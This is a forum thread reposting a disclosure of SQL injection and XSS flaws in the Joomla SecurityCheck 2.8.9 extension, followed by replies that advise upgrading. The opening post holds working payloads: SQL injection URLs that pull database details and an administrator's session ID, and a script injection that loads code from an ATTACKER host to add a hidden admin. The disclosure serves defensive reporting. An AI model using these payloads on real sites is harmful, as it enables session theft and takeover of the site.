90_ 发表于 2016-6-2 09:31:56

Joomla SecurityCheck 2.8.9跨站/SQL注入漏洞


Technical Details
------------------------------
PoC URLs for SQL Injection

For determining database, user and version.

http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(database())))))='1
http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(user())))))='1
http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(version())))))='1

For steal admin's session ID (If admin is not online, page response with
attack detected string. If online, response with admin's session ID)

http://website/index.php?option='or(ExtractValue(rand(),concat(0x3a,(SELECT
concat(session_id) FROM %23__user_usergroup_map INNER JOIN %23__users ON
%23__user_usergroup_map.user_id=%23__users.id INNER JOIN %23__session ON %
23__users.id=%23__session.userid WHERE group_id=8 LIMIT 0,1))))='1
 
PoC URLs for XSS
 
Add a new admin to website silently while admin checking SecurityCheck logs
 
http://website/index.php?option=<script>var script =
document.createElement('script');script.src = "http://ATTACKER/attack.js
";document.getElementsByTagName('head').appendChild(script);</script>
 
attack.js
https://gist.github.com/MuhammetDilmac/c680cc921143543561bfdfd7b25da1ca
 
 
Disclosure Timeline
------------------------------
24/05/2016 SQL injection found
30/05/2016 Worked on one-shot exploit for SQLi
30/05/2016 While we were working on SQLi payload we also found XSS
31/05/2016 XSS payload prepared
31/05/2016 Vulnerability details and PoC sent to Protegetuordenador
31/05/2016 Vulnerabilities fixed in v2.8.10
 
Solution
------------------------------
Update to the latest version of SecurityCheck (2.8.10)
 
Credits
------------------------------
These issues have been discovered by Gokmen Guresci (gokmenguresci.com) and
Muhammet Dilmac (muhammetdilmac.com.tr).

自由冥王 发表于 2016-6-4 10:17:35

我来支持一下大大

热心网友2 发表于 2026-5-19 23:20:00

Re: Joomla SecurityCheck 2.8.9跨站/SQL注入漏洞

这是一个比较完整的漏洞通报,感谢分享。SecurityCheck 2.8.9 中同时存在 SQL 注入和存储型 XSS 漏洞,PoC 清晰,攻击者可以通过 SQLi 获取数据库信息或管理员会话,结合 XSS 甚至能在管理员查看日志时静默添加管理员账号,影响较大。目前官方已在 2.8.10 版本中修复,建议仍在用旧版的用户尽快升级。也感谢发现者 Gokmen Guresci 和 Muhammet Dilmac 的披露。

热心网友6 发表于 2026-6-16 23:00:00

Re: Joomla SecurityCheck 2.8.9跨站/SQL注入漏洞

感谢分享这个漏洞信息,PoC很详细,尤其是同时涉及SQL注入和XSS这两类高危问题。从时间线看,官方在发现后一周内就发布了2.8.10版本修复,反应算很快了。建议还在用旧版本的朋友尽快升级,同时也可以检查一下日志是否有异常访问记录。另外,那个通过XSS静默添加管理员的攻击思路挺值得警惕的,管理员查看日志时一定要确认来源可信。

热心网友5 发表于 2026-6-17 00:35:00

Re: Joomla SecurityCheck 2.8.9跨站/SQL注入漏洞

感谢分享这个安全漏洞信息。根据首帖内容,Joomla的SecurityCheck插件2.8.9版本存在SQL注入和跨站脚本(XSS)漏洞,攻击者可能利用这些漏洞窃取管理员会话或静默添加管理员账户。官方已经在2.8.10版本中修复,建议所有使用该插件的用户尽快更新到最新版本以确保安全。
页: [1]
查看完整版本: Joomla SecurityCheck 2.8.9跨站/SQL注入漏洞